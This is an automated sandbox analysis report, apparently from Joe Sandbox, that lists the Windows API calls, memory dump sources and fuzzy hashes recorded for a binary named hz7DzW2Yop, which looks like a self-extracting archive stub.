                                                                                                  • Opcode Fuzzy Hash: 7da6a313feb345b697c645395a00a621c16b68ff6e7403c62b9f69181f6e2fc3
                                                                                                  • Instruction Fuzzy Hash: 6951F173A10226AFDB258F64EC51FBBB7AAEF80710F154628FC04E6158EB34DC44D692

                                                                                                  Control-flow Graph (rendered graph omitted; basic blocks 923b72-923c0b with executed/not-executed colouring, calling 926088 and the APIs LoadLibraryExW, GetLastError, FreeLibrary)
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00923C35,?,?,00962088,00000000,?,00923D60,00000004,InitializeCriticalSectionEx,00936394,InitializeCriticalSectionEx,00000000), ref: 00923C03
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3664257935-2084034818
                                                                                                  • Opcode ID: d9e1bf9325cdeb4086dafcdb6d6a6bc633ac55e55558ebc964a71c027e2b0150
                                                                                                  • Instruction ID: ddc1d8a9a733868ae5b435381b79140ffc722244bc1ac465c35d4166668caa4f
                                                                                                  • Opcode Fuzzy Hash: d9e1bf9325cdeb4086dafcdb6d6a6bc633ac55e55558ebc964a71c027e2b0150
                                                                                                  • Instruction Fuzzy Hash: 6711CA35A49631BBCB218F68BC4176A37A89F01770F258110FD55FB198D778EF009AD1

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0091081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
                                                                                                    • Part of subcall function 0091081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
                                                                                                  • OleInitialize.OLE32(00000000), ref: 0091AC2F
                                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0091AC66
                                                                                                  • SHGetMalloc.SHELL32(00948438), ref: 0091AC70
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                  • String ID: riched20.dll$3Ro
                                                                                                  • API String ID: 3498096277-3613677438

                                                                                                  Control-flow Graph (rendering omitted): function at 9098e0; blocks call CreateFileW, GetLastError, SetFileTime and internal subroutines 91ec50, 906edb, 910602
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00907760,?,00000005,?,00000011), ref: 0090995F
                                                                                                  • GetLastError.KERNEL32(?,?,00907760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0090996C
                                                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00907760,?,00000005,?), ref: 009099A2
                                                                                                  • GetLastError.KERNEL32(?,?,00907760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009099AA
                                                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00907760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009099F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: File$CreateErrorLast$Time
                                                                                                  • String ID:
                                                                                                  • API String ID: 1999340476-0

                                                                                                  Control-flow Graph (rendering omitted): function at 91b568; blocks call PeekMessageW, GetMessageW, IsDialogMessageW, TranslateMessage, DispatchMessageW
                                                                                                  APIs
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
                                                                                                  • IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
                                                                                                  • TranslateMessage.USER32(?), ref: 0091B5AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0091B5B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1266772231-0

                                                                                                  Control-flow Graph (rendering omitted): function at 91abab; blocks call GetClassNameW, SHAutoComplete, FindWindowExW and internal subroutine 911fbb
                                                                                                  APIs
                                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0091ABC2
                                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0091ABF9
                                                                                                    • Part of subcall function 00911FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0090C116,00000000,.exe,?,?,00000800,?,?,?,00918E3C), ref: 00911FD1
                                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0091ABE9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                  • String ID: EDIT
                                                                                                  • API String ID: 4243998846-3080729518

                                                                                                  Control-flow Graph (rendering omitted): function at 91dbde; blocks call SetEnvironmentVariableW twice and internal subroutines 91ec50, 910371, 91048d
                                                                                                  APIs
                                                                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0091DBF4
                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0091DC30
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentVariable
                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                  • API String ID: 1431749950-3493335439

                                                                                                  Control-flow Graph (rendering omitted): function at 909785; blocks call GetStdHandle, ReadFile, GetLastError, internal subroutine 9098bc, and re-enter 909785 recursively
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00909795
                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 009097AD
                                                                                                  • GetLastError.KERNEL32 ref: 009097DF
                                                                                                  • GetLastError.KERNEL32 ref: 009097FE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2244327787-0
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00923F73,00000000,00000000,?,0092ACDB,00923F73,00000000,00000000,00000000,?,0092AED8,00000006,FlsSetValue), ref: 0092AD66
                                                                                                  • GetLastError.KERNEL32(?,0092ACDB,00923F73,00000000,00000000,00000000,?,0092AED8,00000006,FlsSetValue,00937970,FlsSetValue,00000000,00000364,?,009298B7), ref: 0092AD72
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0092ACDB,00923F73,00000000,00000000,00000000,?,0092AED8,00000006,FlsSetValue,00937970,FlsSetValue,00000000), ref: 0092AD80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3177248105-0
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0090D343,00000001,?,?,?,00000000,0091551D,?,?,?), ref: 00909F9E
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0091551D,?,?,?,?,?,00914FC7,?), ref: 00909FE5
                                                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0090D343,00000001,?,?), ref: 0090A011
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$Handle
                                                                                                  • String ID:
                                                                                                  • API String ID: 4209713984-0
                                                                                                  • Opcode ID: 096363e679af7fc3a5f5366fab83540e426314f56753958740454c32b0fd589f
                                                                                                  • Instruction ID: c0032636c7f5bae442d90f14937aa3ea52b472bce5b0745312843d8756f3789d
                                                                                                  • Opcode Fuzzy Hash: 096363e679af7fc3a5f5366fab83540e426314f56753958740454c32b0fd589f
                                                                                                  • Instruction Fuzzy Hash: 6C31907124830AAFDB14CF20D818BAE77A9EF85715F044919F9819B2D0C775AD48CFA2
APIs
  • Part of subcall function 0090C27E: _wcslen.LIBCMT ref: 0090C284
• CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A2D9
• CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A30C
• GetLastError.KERNEL32(?,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A329
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: CreateDirectory$ErrorLast_wcslen
• String ID:
• API String ID: 2260680371-0
• Opcode ID: 1825e0504ab4d5c7b468cc30ab6b6a82563dfd7c07d4d2b3e902aa4a9c098c11
• Instruction ID: e12ef8f14c35e8595e65448b1faa2fec0387f488c90e0e42091709686e4532c7
• Opcode Fuzzy Hash: 1825e0504ab4d5c7b468cc30ab6b6a82563dfd7c07d4d2b3e902aa4a9c098c11
• Instruction Fuzzy Hash: BD01B135610314AEEF21AB754C0ABED328C9F0A780F044424F901E60D1D768DA8196F6
APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0092B8B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277
• Opcode ID: ce1af82b61ed5b25c1ff2028cc32b8cb060dadbf54c0563d0666b6fc99f513be
• Instruction ID: e6ef189af8f2673d02208451c882723028492461ac79fca7a26ba4131e1ca8cb
• Opcode Fuzzy Hash: ce1af82b61ed5b25c1ff2028cc32b8cb060dadbf54c0563d0666b6fc99f513be
• Instruction Fuzzy Hash: 6B4129755042AC9EDF218E28DC84BF6BBEDDB45308F1408ECE69A86146D3359A85DF60
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0092AFDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
• Opcode ID: 8d6bc9c92abfbdd7b78624a8acc439ad62b14c38c7052460e98da6263f7fe664
• Instruction ID: 0e4449ebafe9d16f32464856d00ee6ebc84a853fca4d7c253bfbe6ba4982b899
• Opcode Fuzzy Hash: 8d6bc9c92abfbdd7b78624a8acc439ad62b14c38c7052460e98da6263f7fe664
• Instruction Fuzzy Hash: D9014C7254411EBBCF129F90ED01EEE7F62EF48754F014254FE1465160C6368931EF81
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0092A56F), ref: 0092AF55
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx
• API String ID: 2593887523-3084827643
• Opcode ID: ba8f49aa1f6b4b5864426ab4bd10d9d805f8bf508951a824bfc2ceb1fdb30d04
• Instruction ID: 1e9b6eab123e4d0c87817be0d5fdff760de6b9236ef7228996978804e4b168ad
• Opcode Fuzzy Hash: ba8f49aa1f6b4b5864426ab4bd10d9d805f8bf508951a824bfc2ceb1fdb30d04
• Instruction Fuzzy Hash: 31F0B47668921CBBCB115F95DC02EAEBF61EF44711F014165FD0956260DA315A10AF86
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc
• API String ID: 2773662609-671089009
• Opcode ID: 66a099eb437a7cb7c83a5ef98a598b2c43de762311bcc488bb053c9f6b48306b
• Instruction ID: 41ab33e9feee32ad22d99b0fe13c82f12e6e04935c64ac596297f28df411e95e
• Opcode Fuzzy Hash: 66a099eb437a7cb7c83a5ef98a598b2c43de762311bcc488bb053c9f6b48306b
• Instruction Fuzzy Hash: 43E0E57268922C7BC611ABA5EC02A6EBB54DB84721F0202A9FC0597280CD705E409ED6
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091EAF9
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 3Ro
• API String ID: 1269201914-1492261280
• Opcode ID: 1a35ee2781db100ade516f357f008f089b93ca110b07eff813a9036a9101be09
• Instruction ID: a6b7eb6a850400030effb9945a1af8e264a9b124e8b8ba201c71ed7ffc1fea01
• Opcode Fuzzy Hash: 1a35ee2781db100ade516f357f008f089b93ca110b07eff813a9036a9101be09
• Instruction Fuzzy Hash: 70B012CA39A5477C310462001D03C7B015CC9C1F95330C42EFC00E4481DC821C860831
APIs
  • Part of subcall function 0092B7BB: GetOEMCP.KERNEL32(00000000,?,?,0092BA44,?), ref: 0092B7E6
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0092BA89,?,00000000), ref: 0092BC64
• GetCPInfo.KERNEL32(00000000,0092BA89,?,?,?,0092BA89,?,00000000), ref: 0092BC77
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
• Opcode ID: 3a20517717972d17a45f7c554e7537de08a4961e317db2c3a7ce3cce91983864
• Instruction ID: ce2d1bde97889d8a2cfa5f882d048273538c7da970b511d3bafbc31f10366ccf
• Opcode Fuzzy Hash: 3a20517717972d17a45f7c554e7537de08a4961e317db2c3a7ce3cce91983864
• Instruction Fuzzy Hash: 195188B1A002659FDB20DF35E8817FBBBF8EF41300F18446ED4968B295D7389945DB90
APIs
• SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00909A50,?,?,00000000,?,?,00908CBC,?), ref: 00909BAB
• GetLastError.KERNEL32(?,00000000,00908411,-00009570,00000000,000007F3), ref: 00909BB6
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 3a022cc5ebb632b2ea0816da8033679ca5577c365be3675815a8e074129a280f
• Instruction ID: ef0e962f434bd79948a03d95de738a11e4ad9c2123438491ed6a6c76cc939490
• Opcode Fuzzy Hash: 3a022cc5ebb632b2ea0816da8033679ca5577c365be3675815a8e074129a280f
• Instruction Fuzzy Hash: D441E1306043028FDB24DF19E58456AB7E9FFD4730F148A2DE891832E2D774ED448B91
APIs
  • Part of subcall function 009297E5: GetLastError.KERNEL32(?,00941030,00924674,00941030,?,?,00923F73,00000050,?,00941030,00000200), ref: 009297E9
  • Part of subcall function 009297E5: _free.LIBCMT ref: 0092981C
  • Part of subcall function 009297E5: SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 0092985D
  • Part of subcall function 009297E5: _abort.LIBCMT ref: 00929863
  • Part of subcall function 0092BB4E: _abort.LIBCMT ref: 0092BB80
  • Part of subcall function 0092BB4E: _free.LIBCMT ref: 0092BBB4
  • Part of subcall function 0092B7BB: GetOEMCP.KERNEL32(00000000,?,?,0092BA44,?), ref: 0092B7E6
• _free.LIBCMT ref: 0092BA9F
• _free.LIBCMT ref: 0092BAD5
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
APIs
• __EH_prolog.LIBCMT ref: 00901E55
  • Part of subcall function 00903BBA: __EH_prolog.LIBCMT ref: 00903BBF
• _wcslen.LIBCMT ref: 00901EFD
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: H_prolog$_wcslen
• String ID:
• API String ID: 2838827086-0
APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009073BC,?,?,?,00000000), ref: 00909DBC
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00909E70
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
APIs
• CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00909F27,?,?,0090771A), ref: 009096E6
• CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00909F27,?,?,0090771A), ref: 00909716
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00909EC7
• GetLastError.KERNEL32 ref: 00909ED4
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• _free.LIBCMT ref: 00928E75
  • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
• HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00941098,009017CE,?,?,00000007,?,?,?,009013D6,?,00000000), ref: 00928EB1
